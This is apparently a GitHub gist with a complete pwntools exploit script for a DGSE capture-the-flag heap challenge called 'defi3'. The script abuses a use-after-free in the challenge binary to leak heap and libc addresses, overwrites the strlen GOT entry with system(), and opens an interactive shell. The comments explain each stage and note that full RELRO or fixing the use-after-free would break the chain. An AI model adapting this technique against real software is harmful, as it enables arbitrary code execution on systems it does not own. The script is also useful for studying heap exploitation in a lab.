@0xPwny
Last active June 18, 2019 19:12
DGSE challenge defi3 - heap
#!/usr/bin/python
from pwn import *
# Path of the challenge binary; every helper below talks to this one process
# handle, so it is created once at module level.
TARGET = "./defi3"
r = process(TARGET)
def allocate(nom, idx):
    """Drive menu option 1 (create an entry) with a name and an id.

    The option number, ``nom`` and ``idx`` are each sent as one line, in
    that order.  Nothing is read back here; callers drain the output
    themselves when they need it.
    """
    for line in ("1", nom, idx):
        r.sendline(line)
def show():
    """Drive menu option 2 (display entries) and return its raw output.

    Pending output is discarded first so the returned buffer starts with
    the response to this command; reading stops at the prompt fragment
    "faire ?".
    """
    r.recv()  # drop whatever the target already printed
    r.sendline("2")
    response = r.recvuntil("faire ?")
    return response
def free(idx, tofree):
    """Drive menu option 3 (free) and answer its two follow-up questions.

    ``idx`` and ``tofree`` are forwarded verbatim as two lines after the
    option number; what the target asks with the second question is not
    visible from this script.
    """
    answers = [idx, tofree]
    r.sendline("3")
    for answer in answers:
        r.sendline(answer)
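def edit(nmorid, idx, data):
    """Drive menu option 4 (edit name) or 5 (edit id) on entry ``idx``.

    Args:
        nmorid: "nom" to edit the name field, "id" to edit the id field.
        idx: entry index, sent as one line.
        data: replacement content, sent as one line.

    Raises:
        ValueError: if ``nmorid`` is neither "nom" nor "id".  The previous
            version sent ``idx`` and ``data`` anyway without a menu choice,
            which silently desynchronised the conversation with the target;
            failing before anything is sent is easier to debug.
    """
    option = {"nom": "4", "id": "5"}.get(nmorid)
    if option is None:
        raise ValueError("nmorid must be 'nom' or 'id', got %r" % (nmorid,))
    r.sendline(option)
    r.sendline(idx)
    r.sendline(data)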
# Stage 1: populate the target with three entries.  The first two use 8-byte
# name/id strings, the third 48-byte ones (6 * 8) -- presumably so the third
# entry lands in a different allocator size class; confirm in the binary.
print "[+] CHUNCKS CREATED "
allocate("AAAAAAAA","BBBBBBBB")
allocate("CCCCCCCC","DDDDDDDD")
allocate("EEEEEEEE"*6,"FFFFFFFF"*6)
r.recv()  # drain the menu output produced by the three allocations
pause()   # wait for Enter, e.g. to attach a debugger before the frees below
# Stage 2: free entries 1 and 0 (the second answer, "2", is whatever the
# target's free menu asks for next; its meaning is not visible here).  show()
# is then expected to still print through entry 0 after it was freed -- the
# dangling reference (use-after-free) the rest of this script depends on.
print "[+] CHUNK FREEd"
free("1","2")
free("0","2")
print "[+] HEAP LEAK .. DONE"
heapleak = show()
# Take the text after the first ": " up to the newline and unpack it as a
# little-endian 32-bit value; this is treated as a heap pointer.
HEAP = u32(heapleak.strip().split(": ")[1].split("\n")[0])
# 0x15c0 is the distance from the leaked pointer to the heap start for this
# particular binary and run; it is not derived from anything visible here.
HEAP_BASE = HEAP - 0x15c0
print "[+] HEAP LEAK : ",hex(HEAP)
print "[+] HEAP BASE : ",hex(HEAP_BASE)
# Stage 3: write through the dangling entry 0.  Its name field is replaced
# with a heap address (HEAP_BASE + 0x1520); the next allocation's 3-byte name
# then appears to overwrite the low bytes of a pointer so that, per the
# author's comment, it points at the binary's strlen GOT slot.  show() then
# prints the resolved strlen address, giving the libc load address.
edit("nom","0",p32(HEAP_BASE+0x1520))
allocate("\x30\x20\x60","RRRRRRRR") #overwrite pointer to strlen GOT
r.recv()
libcleak = show()
# The printed pointer is shorter than 8 bytes (presumably the high NUL bytes
# of a user-space address are not printed -- confirm), so it is right-padded
# with NULs before unpacking as u64.
LIBC_strlen =u64(libcleak.strip().split(": ")[1].split("\n")[0].ljust(8,"\x00"))
# Both offsets are specific to the libc build shipped with the challenge.
LIBC_base = LIBC_strlen - 0x8b720
LIBC_system= LIBC_base + 0x45390
print "[+] LIBC LEAK : ",hex(LIBC_strlen)
print "[+] LIBC BASE : ",hex(LIBC_base)
# Stage 4: replace strlen's GOT entry with the address of system().  Only the
# low 5 bytes plus one 0x7f byte are sent (p64(...)[:-3] + "\x7f"), which
# covers the 6 significant bytes of a user-space x86-64 pointer; the two
# high bytes are presumably already zero in the slot and cannot be sent
# because the write is NUL-terminated -- confirm against the binary.
# After this, whatever string the program next hands to strlen is executed
# by system(), hence the "sh" sent as input.
# Defender's note: this last step only works because the GOT is writable at
# run time (no full RELRO) and because of the use-after-free from stage 2;
# fixing either one breaks the chain.
pld =p64(LIBC_system)[:-3]+"\x7f"
edit("nom","0",pld) # overwrite strlen GOT to system()
r.sendline("sh")
r.interactive()